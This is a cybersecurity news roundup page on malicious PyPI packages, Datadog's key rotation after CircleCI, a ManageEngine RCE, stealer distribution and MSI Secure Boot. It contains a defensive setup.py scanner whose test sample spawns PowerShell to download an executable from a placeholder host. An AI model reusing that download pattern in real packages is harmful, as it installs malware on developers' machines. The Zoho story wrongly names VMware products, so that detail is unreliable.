Hackerzhome


Cybersecurity news all over the world

HACKERZHOME NEWS

January 17, 2023

Tuesday

The lolip0p virus is installed using malicious PyPI packages.

Three malicious packages containing code to install info-stealing malware on developers’ workstations have been posted by a threat actor to the PyPI (Python Package Index) repository.

The three packages, named “Colorslib,” “httpslib,” and “libhttps,” were all uploaded between January 7 and January 12, 2023, by the same author using the username “Lolip0p,” according to Fortinet.

All three have been reported and removed from PyPI.

PyPI is the most popular repository for Python packages, which developers use to source the building blocks of their applications.

That popularity also makes it an attractive target for threat actors who want to reach developers and their projects. Malicious packages are frequently uploaded posing as useful tools, or imitating well-known projects under a slightly altered name.

According to the PyPI download statistics service “pepy.tech,” the three malicious entries had the following download counts by the time they were removed on Sunday, January 14:

1. libhttps – 68 downloads

2. httpslib – 233 downloads

3. Colorslib – 248 downloads

All three packages carry a malicious “setup.py” that attempts to launch PowerShell and download the executable “Oxyz.exe” from a suspicious URL. That executable is an information stealer that harvests browser data.
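The install-time behaviour described above is something a defender can screen for before installing an unfamiliar package. The following is an added example, not code from Fortinet, PyPI or the article: it statically walks a setup.py with Python’s ast module and flags process spawning, dynamic exec/eval, PowerShell references and URLs pointing at executables. The two setup.py samples and the example.invalid URL are constructed for illustration.

```python
import ast
import re

# Calls that run code or spawn a process at install time; a setup.py should
# only describe metadata, so any of these deserves a manual look.
SPAWN_CALLS = {
    ("subprocess", "Popen"), ("subprocess", "run"), ("subprocess", "call"),
    ("subprocess", "check_output"), ("os", "system"), ("os", "popen"),
}
DYNAMIC_EXEC = {"exec", "eval"}
URL_RE = re.compile(r"https?://[^\s'\"<>]+")

def _qualified(node):
    """Return ('mod', 'func') for mod.func(...), ('', 'func') for func(...)."""
    f = node.func
    if isinstance(f, ast.Attribute) and isinstance(f.value, ast.Name):
        return (f.value.id, f.attr)
    if isinstance(f, ast.Name):
        return ("", f.id)
    return None

def scan_setup_py(source):
    """Statically scan setup.py text; return a list of human-readable findings."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _qualified(node)
            if name in SPAWN_CALLS:
                findings.append(f"line {node.lineno}: spawns a process via {'.'.join(name)}")
            elif name and name[0] == "" and name[1] in DYNAMIC_EXEC:
                findings.append(f"line {node.lineno}: dynamic code execution via {name[1]}()")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if "powershell" in node.value.lower():
                findings.append(f"line {node.lineno}: references PowerShell")
            for url in URL_RE.findall(node.value):
                if url.lower().endswith(".exe"):
                    findings.append(f"line {node.lineno}: fetches executable {url}")
    return findings

# Constructed samples (not the real packages' code; the URL is a placeholder). The second mirrors the article's install-time PowerShell download of Oxyz.exe.
BENIGN_SETUP = '''
from setuptools import setup
setup(name="colorlib", version="1.0", url="https://example.invalid/colorlib")
'''
SUSPICIOUS_SETUP = '''
import subprocess
from setuptools import setup
subprocess.Popen(["powershell", "-c", "fetch https://example.invalid/Oxyz.exe"])
setup(name="httpslib", version="1.0")
'''
```

Run `scan_setup_py()` over the setup.py of a downloaded sdist before installing it; an empty list is not proof of safety, but any finding is a reason not to install.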

NEWS 1


Datadog changes the RPM signing key after the CircleCI breach

Datadog, a cloud security company, reports that the recent CircleCI security incident exposed one of its RPM GPG signing keys along with its passphrase.

The company says it has not yet found any evidence that the key has been compromised or misused.

In response to CircleCI’s announcement that the threat actor took customers’ environment variables, tokens, and keys from its databases, Datadog has released a new version of its Agent 5 RPM for CentOS/RHEL, signed with a new key.

The company has also released an updated Linux install script that removes the affected key from the RPM and Datadog repositories.

According to Datadog, even if the attacker were to obtain the signing key and use it to build a malicious RPM package, they would still need access to the official package repositories to deliver it to the company’s customers.

The announcement from Datadog comes after CircleCI said on Friday that one of its systems had been compromised by malware on a laptop belonging to an engineer.

CircleCI first disclosed the security incident in early January and advised all customers to rotate their secrets and tokens.

NEWS 2


Researchers are about to disclose a proof-of-concept exploit for the serious Zoho RCE flaw.

Proof-of-concept exploit code will be made available for a serious vulnerability in multiple VMware products that permits remote code execution (RCE) without authentication.

This pre-auth RCE flaw, tracked as CVE-2022-47966, is caused by the use of an insecure, outdated version of the third-party dependency Apache Santuario.

If SAML-based single sign-on (SSO) is, or was at any point before the attack, enabled, successful exploitation allows unauthenticated threat actors to execute arbitrary code on ManageEngine servers.

Security researchers with Horizon3’s Attack Team alerted administrators on Friday to the existence of a proof-of-concept (PoC) exploit for CVE-2022-47966.

Horizon3 intends to publish its PoC exploit later this week; it has not yet released technical details or shared any indicators of compromise (IOCs) that defenders could use to determine whether their systems have been attacked.

The Horizon3 researchers also provided a screenshot showing the attack run against a vulnerable ManageEngine ServiceDesk Plus instance.

NEWS 3

Raccoon and Vidar Stealers Proliferating Through a Vast Network of Cracked Fake Software

NEWS 4

Since early 2020, information-stealing malware like Raccoon and Vidar has been disseminated using a “large and resilient infrastructure” made up of over 250 domains.

Security company SEKOIA stated in research released earlier this month that the infection chain “uses roughly a hundred fake cracked software catalog websites that lead to multiple links before downloading the payload located on file share networks, such as GitHub.”

The French cybersecurity firm determined that the domains are run by a threat actor operating a traffic direction system (TDS) that other cybercriminals can rent to distribute their malware.

The attacks use a tactic called search engine optimization (SEO) poisoning to target people who use search engines such as Google to look for cracked software and video games: bogus websites are pushed to the top of the results and trick visitors into downloading and running the malicious payloads.

The poisoned result includes a download link for the promised software; clicking it starts a five-stage URL redirection chain that lands the user on a page holding a shortened link to a password-protected RAR archive hosted on GitHub, along with the archive’s password.

Hundreds of motherboards' Secure Boot functionality have been broken by MSI.

Over 290 MSI motherboards are reported to ship with a default UEFI Secure Boot setting that allows any operating system image to run, even when its signature is invalid or missing.

The issue was discovered by Polish security researcher Dawid Potocki, who says that despite his attempts to contact MSI and report the problem, he never received a response.

Potocki says the problem affects even brand-new MSI motherboard models, including numerous Intel- and AMD-based MSI boards running a current firmware version.

UEFI motherboards have a security feature called Secure Boot that makes sure that only trusted (signed) software can run during the boot process.

This security mechanism is intended to stop the computer from being infected by UEFI bootkits/rootkits, and to alert users that their operating system has been altered after the system’s vendor shipped it.

According to Potocki, the January 18, 2022 release of MSI’s firmware update version “7C02v3C” altered a default Secure Boot setting on MSI motherboards so that the system will boot even if it detects security violations.

NEWS 5
